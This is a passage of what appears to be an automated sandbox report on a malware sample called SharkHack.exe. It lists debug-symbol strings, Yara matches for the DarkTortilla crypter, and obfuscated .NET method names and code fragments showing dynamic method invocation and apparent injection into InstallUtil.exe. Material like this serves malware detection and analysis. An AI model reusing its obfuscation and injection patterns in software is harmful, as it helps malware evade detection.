                          Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb V source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbH source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb`[p source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdb\rvr <{ source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdbYYc source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbn=h source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr

                          Data Obfuscation

                          barindex
                          Yara detected DarkTortilla Crypter
                          Source: Yara matchFile source: 0.2.SharkHack.exe.5e70000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.InstallUtil.exe.44e31f0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.5e70000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.InstallUtil.exe.44e31f0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.2903541486.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2860912420.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: SharkHack.exe PID: 6224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2476, type: MEMORYSTR
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs.Net Code: Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777245)),Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777259))})
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, TRYKkNvh8fRn9U4uBi5.cs.Net Code: Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777245)),Type.GetTypeFromHandle(Fap0GrmKF5nC91t69JH.ApPtAllIw51(16777259))})
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_06029CE8 push es; ret 0_2_06029CF4
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_087417F5 pushad ; ret 0_2_0874D915
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_089C04E5 push edi; ret 0_2_089C04E6
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0AD50 push es; ret 0_2_08A0AD60
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0C8D4 push esi; retf 0_2_08A0C8D7
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0C8D8 push 3EE8F88Bh; retf 0_2_08A0C8EF
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A02853 pushad ; ret 0_2_08A028FD
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0C853 push D3E8F88Bh; retf 0_2_08A0C85A
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A02555 push edi; iretd 0_2_08A02556
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0274B pushad ; ret 0_2_08A028FD
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08A0274B push 480000C3h; ret 0_2_08A02935
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_08EFA82D pushfd ; retf 0_2_08EFA82E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BAC338 push 0000003Bh; ret 7_2_07BAC33D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BAC30B push 0000003Bh; ret 7_2_07BAC30F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BAADA4 push 0000005Dh; ret 7_2_07BAAE0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_07BA2555 push edi; iretd 7_2_07BA2556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0801B952 push 0000005Eh; ret 7_2_0801B980
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_08018172 push esp; ret 7_2_08018179
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0842ADF0 push 00000059h; ret 7_2_0842AE10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0842A6CD pushfd ; retf 7_2_0842A6CE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_085E17F5 pushad ; ret 7_2_085ED915
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_03034DC9 push ss; ret 9_2_03034DCF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_030341D4 push es; iretd 9_2_030341DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h10_2_0043F005
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00445408 push ebp; ret 10_2_00445409
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044866F pushfd ; retf 10_2_00448677
                          Source: SharkHack.exe, 5mSUZVFK.csHigh entropy of concatenated method names: 'U', 'MoveNext', 'j', 'SetStateMachine', 'i', 'MoveNext', 'U', 'SetStateMachine', 'U', 'MoveNext'
                          Source: SharkHack.exe, J5EUz.csHigh entropy of concatenated method names: 'zKI7V2lCAHyns', 'vJUm9hbj5TRt', 'CjBqAqjsHy7R1V', 'ziNGNF00bKpXW', 'FSvKeOgjOpFmzw', 'CRH2r57ZiBYsue', 'aEx4F00z8', 'Iro6S', 'DVqxkhrKJu', 'FqAl7t4Pp'
                          Source: SharkHack.exe, 2p8RzNLX.csHigh entropy of concatenated method names: 'c', 'MoveNext', 'f', 'SetStateMachine', '_Lambda_0024__0', '_Lambda_0024__0', '_Lambda_0024__0', 'fhwhUgICdx3', 'lRelmpPMQci', 'iQqBzFFskoA8'
                          Source: SharkHack.exe, 7atw2xxkDk.csHigh entropy of concatenated method names: '_4qfMPYP3', 'rCA1O0B0KmxSy', 'Zpr33eF', 'yci5giJjn2Ngb', 'ubtktyzZRd7m70', '_4YkmGDCz', 'BLboUHG0uSlKJ', 'IlTslQNj8xB9lX', '_7xeHl3ApNp', 'd8VLMbHzq'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TOBrL6X7YwccS2N0NZJ.csHigh entropy of concatenated method names: 'zm0XrQUEr3', 'qwEXDtttrI', 'ihZXeZIv5Z', 'GORXV39K91', 'sifXfoxlyj', 'eiYXoBKEY7', 'DtaXRTXFRo', 'cOjXNREx1h', 'Dispose', 'G5dOXFixcj7lHY6Xsmkg'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, CvBTB634WJbsbdNk0HA.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, TRYKkNvh8fRn9U4uBi5.csHigh entropy of concatenated method names: 'rsb58CimF39qL8auIGBi', 'TOuEQdimAEilESGTAkdn', 'yeQxIiQa2f', 'K96RrXim6imBPBYuaCF6', 'yhOIVoim2WXPyNieqygP', 'nfyYlsimUrQICBGa8YRe', 'aVlhK4imJMpY9cmF3OgL', 'dCVYgnim7gcRxUENV4Dj', 'I4IeUAimKMeEV4QD9Q8S', 'LceNI4imsVEybgty6fnA'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, eufhKGg27Q7RWQ163S4.csHigh entropy of concatenated method names: 'y7AgJ47Ibb', 'lSCg7ih3wl', 'uIegKhUsFe', 'y6RPLViqggMjEGrIc45o', 'mM5C0diq6qNG3SZCugTD', 'rn4QOaiq9cVuJYaDvD4K', 'glm8ckiqcsVZJNUXXj7g', 'fLuOxDiq2AQSK1wN9g0n', 'HRtSOjiqUHNyg4RVtdpu', 'KfWc9viqJKlWKEraPRGL'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, njrujeAENEBnoTwLEll.csHigh entropy of concatenated method names: 'gORAxKvssZ', 'pPxAmA6eHe', 'HFZACYZWUP', 'MEPAzuvJVK', 'MZL9d5qASX', 'oBD9ig3hBF', 'sT19tBjD21', 'LVbTJ4iBcmQBOH8J7rTk', 'J5wk1HiBA0PX4UymQGsi', 'Pu09Q1iB9hTPmfcv6so7'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, enykyluTt8tntLMmTmH.csHigh entropy of concatenated method names: 'OLMumRSCYl', 'XkeuzjtoqW', 'kCJuj7fe2v', 'mfHuZbqKI1', 'iFiuLxc6SV', 'RuFu0QjAeB', 'RXeu5biLrD', 'sjxu1ADZNe', 'Y7xuw2TJJt', 'ubguEMjAkj'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, M6XlSeiCbULdwXerUj5.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'nJMigi5FRve', 'emDiFi8Sspd', 'XadkpOiuvpGcqrg9hvsX', 'DF2j12iuxB4Pj4VPlrd3', 'jpUPFAiumHrEqj8EeZMR', 'EtDRnJiuCOSlpFltrdUo'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, t0QDrItwOiM5sAdQ4F5.csHigh entropy of concatenated method names: 'lExWcRDgrw', 'KolcrCiyX5CWwth6sTBe', 'juj3y4iyvb1nOjAXfwVa', 'ESwdv3iyxydv8mZDkLjs', 'uxtEA3iyIA53mwnTtkcB', 'puxb74iy8SWxkNxoF1ko', 'Ns2MNsiymU1qRnHgXnIi', 'RmGB4IiyCfOVAqujobat', 'U3PWd1dYbZ', 'iUiWtNZQ5Z'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, W367m4PC7kPOgq5eVvx.csHigh entropy of concatenated method names: 'R3g4dwI4oQ', 'uMc4iKEW79', 'Yd7', 'SMu4tbhN0y', 'CxB4Whs2Hm', 'vkW4FKlUk5', 'Qpg4AR4uil', 'r63Rrhi15A1msADN2QPG', 'veC1RPi1LKxFDkV04pDI', 'YVi9oci10DmbNJMWq76s'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, K3EvFZAQXLSG11lHyGN.csHigh entropy of concatenated method names: 'q64', 'P9X', 'D4BiFKx8wfY', 'vmethod_0', 'YDaig94u3Hi', 'imethod_0', 'n51hkKi4ZU9a8MVyWaVu', 'oWnesRi4L3xrcrtSsKuA', 'UZotk0i406BJ1BiNUuqY', 'hDiIvdi45gODyG82NnTk'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, j85yTp6tKZORN4qjSRA.csHigh entropy of concatenated method names: 'xOV6FQR8AC', 'xnT6AxoVa9', 'R0B69aWJWa', 'Iny6cYJnFR', 'Sdx6gEr1t8', 'pTH6661VtQ', 'ojD62cBUDt', 'OL56USE3J5', 'Wdk6J6oG7a', 'G3J6772WP1'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, ONP1BPc6cApGusCcp5X.csHigh entropy of concatenated method names: 'EZMcUbtrsd', 'DHxcJ1RUq7', 'fM9Tl2iHFmaypPPjn0QJ', 'neRT3KiHtLYNcxjoQLaI', 'T8Ql6FiHWgdF2BXHSgGw', 'WVyjOXiHAoagRkcrDVCt', 'F50sYGiH9gTkGZwXhHfJ', 'eJljkFiHcqRNLyYjru4M', 'L4UnEjiHgumuesN9t37e'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, CdKxLo9TWUhYReDFyxB.csHigh entropy of concatenated method names: 'YAd9Xs9Qrk', 'WTG9vFl8cd', 'hU19x0ovVn', 'a8U1UPiBaR75mNMVM3rs', 'eiMjpIiBIXpVDpW1Wwg2', 'cmdZSQiBwGXUeVguP741', 'Heo1juiBEOY4hffS6TGV', 'o869j9psnq', 'EbA9ZZoBWW', 'QiZ9LVZXA6'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, doZtkVpKf8U8WppqJbu.csHigh entropy of concatenated method names: 'Gw4pp3Mn2I', 'msUsMSiSZtYCWhASMk1r', 'TSOv3EiSbiimwTjCU0yD', 'v02dWiiSjuj7HvgVQXuQ', 'Y5yprX0fLJ', 'G5CWGdiSOhW3J5malMtj', 'eoji8piSnwH4C7qwDQV2', 'UpXuYYiSMNQ3seLk7dnD', 'lpuy2aiSlA7vxNiYqGdc', 'HEILSoiSQCTwHyWRkVui'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, kBmXH9l497Qp6LWRqH1.csHigh entropy of concatenated method names: 'GSIlHslRdW', 'SMNlqwjkfL', 'DrnlnckADm', 'rY3lMcjsHs', 'MrrlOa28aA', 'VDCllhn4oQ', 'Ci8lQ4iZXB', 'KxjlSwlAAN', 'hswlTLLiGM', 'QWPlbB559Z'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, tkqlLoFQh50kIsJmFdn.csHigh entropy of concatenated method names: 'CTTFm2EQPu', 'KdxrEQi4WA4KGGA83aKp', 'dqXN5Hi4ibkkuNYfDSvL', 'E6ZRdRi4ts6Iix85QWAo', 'i9fy9ti4cjyxOXU8ieh6', 'Td5Anxi4Afx43aKysD5w', 's3ShvRi49lu3FMYVCs6i', 'cN9EIei4gOBIhPdWyacg', 'nLFA9k83yW', 'bbjkHli4JYNdegpEhNMR'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, j5ldwtDysIL7AmxK4MB.csHigh entropy of concatenated method names: 'GaTDMYN2FP', 'VKvEGQiQ8CH8PauAgAHw', 'SqPmOtiQagjD9embqkAh', 'CHxV7NiQIDbAHo8ICewc', 'vN4WWgiQXqugIxVQLrFp', 'KjeDP8M6tr', 'tqmD46PADe', 'ykBDBQrvD3', 'bwDlvPiQ56JXxAKauqSr', 'r9E2S3iQ1cnB9ncuPPve'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, E3o6QD3SlpgCyI5E6Rs.csHigh entropy of concatenated method names: 'wDH3bq90Rx', 'JZL3ji9pIL', 'lQt3ZkJW6A', 'Y4p3LsC6yh', 'o8c309LfPh', 'A1i35O5Lww', 'fEH31ZakHP', 'Lsx3w3EgsL', 'QKs3ElUcCV', 'fR93aP2Xec'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, to79D6fEqAGFyBNeY0p.csHigh entropy of concatenated method names: 'PX4fIii4Kn', 'GwPf8WdyJi', 'bpOfXlh5Ya', 'XFSfv2EsJL', 'z10fxyxMwW', 'nfZC49ijOPoRTNLsNB4B', 'vY8Y7HijnwHbdBwefhK3', 'TPciraijMI3fsfiyCJmi', 'XU0bY6ijlLmm86iu86xI', 'TOCFUXijQT8BYiGUxr3x'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, WTs7qahlV64qvKrIvj.csHigh entropy of concatenated method names: 'SkHq1dNMd', 'LMKXHviNB3wuhWF9puNX', 'S1P3fXiNHTv2qmCPkFkg', 'RQr4I6iNPxBceHs4cSvL', 'pvoKTViN4r8YILC0F5xr', 'oEhDjiANh', 'f6kp1TRE4', 'vRxGQlJfG', 'VYGeQhudC', 'mi5V1AwRD'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, XnJrhIl69rXGORX84dr.csHigh entropy of concatenated method names: 'JnhloxK0r2', 'fSlPwQiI9Tksvp8rHrS3', 'Nt8lfHiIcFdrHeMunqZF', 'WZH1YpiIFdERgFh0UODh', 'gIdShDiIATrpcxeHHZYj', 'fHq5asiIgCiCGPBRDysK', 'IPy', 'method_0', 'method_1', 'method_2'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, EHXH4ePZVLGwViqivQ6.csHigh entropy of concatenated method names: 'Ky5P0IYQns', 'GcpP5pcIhd', 'xljP16IuaG', 'VycPw2NSUm', 'YQiPErtfw7', 'EVMjAsi1nKmsoCXQoJ3I', 'ybi7Lfi1MuYsYs3TH0qZ', 'JV6mGwi1OGb9ZNpPG7W3', 'QT4CV7i1HwtKnnNeM6bb', 'bgZGPxi1qZga6oWa9owa'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, JALrlWcMr32WYbVn0It.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'MQXiFff14W8', 'pgjigUnOEKY', 'imethod_0', 'LJABcoiHbx3Msjd5RMSk', 'VyTnnXiHjR7qM1FcpXIZ', 'RHvSmEiHSaGejFE3GaGv', 'jWq1hkiHT6atkWG94NmV', 'avIA4biHZMnSrWMoLXdc'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, DxdlsJWwhGQkGc7gyLW.csHigh entropy of concatenated method names: 'k7xFWTgw8K', 'IXGFFg6IfQ', 'GvrFAPWVNK', 'VUCrZDiPdqC32dlULga1', 'yHwQGeiPiA82vx35pHQH', 'nhb6dGi3CbGnHmdEtle8', 'M97Kk5i3z9k4kNGNNwbb', 'e2JFU72eOl', 'cweULTiPAlIkIhUI0L3S', 'zqNlKAiPWeOyONNmQoiG'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, qWmkX1X4jrPDrUUx6M9.csHigh entropy of concatenated method names: 'curXHHtjBT', 'wysXqMKiDy', 'qiKXnX6hRk', 'vn1XM2wFd3', 'Dispose', 'eGwa8PixYUNNGZRoV7fh', 'PGCNvPixsNNGbGGLhbY1', 'wyRMcXixrJcaDnHwiFOl', 'lSuue9ixhfMhihBvP5hc', 'eE3XyjixkFy9jBYXtAvO'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, rGEnirI4PkjmAkeSbof.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'UniIHxoqeV', 'q1DNRciXPAiwqPfbBuXw', 'IH2pfEiX4kOIPLEpmfwq', 'w2aU2ZiXBA4xr0Cspiqc', 'E4mmKpiXHFGyfev9LXmL', 'AHhLH0iXqlCtytBNQ8dn', 'TixsTOiXnYwt6UEpf5pf'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, PQrxBjIODNycEAnm1rG.csHigh entropy of concatenated method names: 'pD6igNlvNVY', 'pgVi9R7L4Mu', 'TekrS0ivWxZkxmDwwQaK', 'S0PgjmivFAKdWkkpFtFL', 'eW0fqkivAwXEdR4PNAaf', 'wfcIUIiv6KgySMi8nyMd', 'uIbeHUivcgfW8UhQFrd2', 'FoJAx4ivgqK0KW0AHBX8', 'dqpFYeiv2O9wmRFbIu7E', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, PLaouIpXWde9VO39AvE.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'g08pxWXGVJ', 'MbgigkTKIC1', 'mGLcf9iTVgmIgkly0GsH', 'DIHEaOiTGfK374jPwlbQ', 'KPnm40iTeBomsv4VoVmX', 'zi7UrxiTfGAGgWj3iSdD', 'vgCQWniTojm3Ed7de6Jc'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, ADxUWXcTm5fwO7hpxRa.csHigh entropy of concatenated method names: 'FWTcXAUNQm', 'F5IcvcXehI', 'RQPALIiHXTEww1HcNYOe', 'IrA80CiHIKvt7lGuj7x9', 'MQaKlIiH8QRQvOip87K9', 'kp1Nb8iHvwiVkq2tu0PS', 'LKycjJfciT', 'bcccZsmQID', 'FiMcLg9liF', 'hKJc0A1bDQ'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, apHiiOguZikCMHPSt2Q.csHigh entropy of concatenated method names: 'Ekdg3XsFqu', 'ocLgPLUfXW', 'xERg4Ul8GB', 'l7jgB03ODO', 'HAkgHaDEZn', 'C2ugqIHStw', 'bwhWG1iqO2lHWWH8NRgv', 'w8yosbiqlEPnQVH8bAk1', 'LSUJo3iqQEXD7j6VUPIl', 'FNjSRCiqS6SmZ8QRUOZg'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, psNs80sV3GoHG24hGi5.csHigh entropy of concatenated method names: 'rK6D761SuV', 'paCDKldvFP', 'qAXvlOiQ4Ec9ea6vS3yA', 'oHbijViQ3T55xvaqfXDo', 'vHpFwJiQPJiZg62EapsP', 'f6oPWEiQBaMf65g5ZECW', 'EGjDD7Vihr', 'ntSXbfiQMlhmg4j6YqVb', 'hnKrZciQqTPEYEPCLkoB', 'pk5x5BiQnSAn6r885X24'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, R8iwBJmQj5yJVN7ORn9.csHigh entropy of concatenated method names: 'cvsi9BLmhi7', 'MwZi9HY1wIP', 'n8Ai9qOi27q', 'v1ai9n5DKKV', 'C3Fi9M7sE6u', 'zmAi9ORNrIh', 'eO4i9lJrHc0', 'rgLCAoclPv', 'X7mi9Q6WV2c', 'm2Zi9SiupOE'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, cnVlqyHnmS6FTQws4nV.csHigh entropy of concatenated method names: 'Close', 'qL6', 'WrHHOZx8Hc', 'tWPHlXpT8O', 'pcUHQ42U8p', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, WqFy2NyLWpuB3vb1eE7.csHigh entropy of concatenated method names: 'Nu7y56rjt3', 'g7ay1Kjw10', 'XZTywWNiuB', 'L98Udni0R22QMappggOc', 'LED3hdi0NAdHfG12qnAu', 'UpJKL0i0uraoAf1lDWHS', 'nqR5YGi0yp9qQ1sd01vj', 'CIwRtCi03TrbYSAUaQ8t', 'kvSveAi0Pwku1NXmWCB2', 'VyOgc5i04N2bAwsFg3x0'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, h1V98lGUl2NtAlQaa4v.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'dK0igembaTh', 'hk6igVn0YHx', 'cwlIrNiTTHO9uET3kvEB', 'HW9GngiTbXsU8lUq8o2d', 'rQipGqiTjsGYUunpIorJ', 'c2JaF4iTZRVbWahr5aS8', 'RlAuG3iTLQyOYFkrBFyE', 'TQDGroiT0B34wBPPxI9T'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, DVe77uArnwnNDQv3Dbl.csHigh entropy of concatenated method names: 'BdoAuXcNyQ', 'sbYAyWySxj', 'RkYA34EEpW', 'IMQQgai4HEgK1Fgd6ict', 'GoPTa3i4qipsqQfMZ9yx', 'xenTsWi4nVRMnJSnr8lm', 'urpAflrHeT', 'PeRAof6LJe', 'uHeQqNi4P9NQqL5xspvZ', 'MncRqii44PvKVecdRfNw'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, agSmQGA6x8YKfIQZYUp.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'uLJigAm668E', 'emDiFi8Sspd', 'ncBawSi4r78xPuXP857Y', 'KIuUkIi4YFvxDstVLyQR', 'daIEshi4hKQPS9QdQWr0', 'wDNqoni4kLWaBydrmwIf'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, bPe62WgY07dCC4gPiXE.csHigh entropy of concatenated method names: 'd2fgpQOWB6', 'vwSyCxiqVjHtUKlW7UW9', 'lBBWsCiqGBsxAxI7oKNa', 'dAyGTNiqes33YSA7Yo1m', 'Ql6CaQiqfelB3Mknc8h0', 'Xj6gkV3Aqk', 'r6a5cZiqYkuSybRuQaAm', 'q4ti3wiqhVuBqy8VAOjT', 'pImJvwiqksfAkO03akl0', 'RgYlN6iqsUB3eaSvj4DU'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, xCU4oKgLJwFqTGxqALe.csHigh entropy of concatenated method names: 'WajgXCOYMc', 'IhU4i8iqzWWhVtKQVd6A', 'BTYafhiqmcBE2gdhsklL', 'GBn7YTiqCgXd6ugUTmEr', 'YMYbHFindPXSSOwRNCxU', 'sl0WgdiniVqHWAphT448', 'P9X', 'vmethod_0', 'PggiFuwnE7M', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, l2tJJiMnOtjjkuebrby.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'sV3ex6iaGpghvPguWQMr', 'W7gWWtiaD5nB6hPN9lfv', 'otvILPiaparygUU689XY'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, EyYZxMzQJxf9HhxQVX.csHigh entropy of concatenated method names: 'fVjiiqAZ3I', 'ahPiWB98ge', 'En4iFpwGRO', 'dBciA37MDV', 'IWRi97MDn0', 'eNticQ6lY6', 'csPi6Pl1cD', 'GnbyEriu9vy9T1GSgwUA', 'pfnyumiuceCGTZBw2tYP', 'r9HXGLiugyUiFJC9bmpX'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, UXLx0DRf21RZHTP33Hg.csHigh entropy of concatenated method names: 'GSWRRDjcyV', 'fnWRNYf7TQ', 'Vl1RuskHFv', 'VkQRyTjOv6', 'VysR3f8YMA', 'O8tddWiZlfG4LlbiejiZ', 'jn4uHwiZM1Lck4f9bIn6', 'hTdOpNiZOY6hbwaXVVfB', 'qKikmciZQ0OK6AFIPUut', 'I3vIeeiZS72BXjCfNh2G'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, cmRE6fuWoqjFh1rfG4S.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'Dh8uA1TJGA', 'Write', 'nOpu9O2qJk', 'VWguclUjAg', 'Flush', 'vl7'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, eOnlQ4DIVobuujehJy8.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'm4Gig7ovubh', 'TGhiFL1Jfm5', 'vnQHFwiS7pRjTsrkh6EJ', 'Sn9Lp8iSKXPoCgpTYCTV', 'gOWmHtiSs7dhTNmJ3FjE', 'NCA0rRiSrIQmDORop8MB', 'Qv7QG4iSYC5QXDC4J1BH'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, wfHRURyCvBN9uMe08Zq.csHigh entropy of concatenated method names: 'a8E3dv4sxr', 'Ydp3ikKJtr', 'uEt3t7yO7s', 'hq03WKTNHO', 'zGm3FInf2q', 'ICN3AcpAqg', 'SoVv22i0Lxm98HA0Y3dw', 'FnbkbQi0jtYRZDEdEJGI', 'PisA2si0ZWYXXBNoaC4U', 'l6Nq5Di00NbEQgmZ4SMv'
                          Source: 0.2.SharkHack.exe.4999550.1.raw.unpack, xOXNLvtA6BvgJw9KH17.csHigh entropy of concatenated method names: 'PQdtchWSZQ', 'qVMtgFlUpP', 'GR3t6s3Qqd', 'FMFt29p8AZ', 'R1t78TiyUol8wQPA0nlL', 'oLEKFqiy6PGlflykFJ7u', 'leQmHDiy2614NMNugdnH', 'HnBEBOiyJxcAf2fTrOlB', 'HKokANiy7bk6hw68PJnN', 'IDnMlPiyKugYYIXf5rpI'
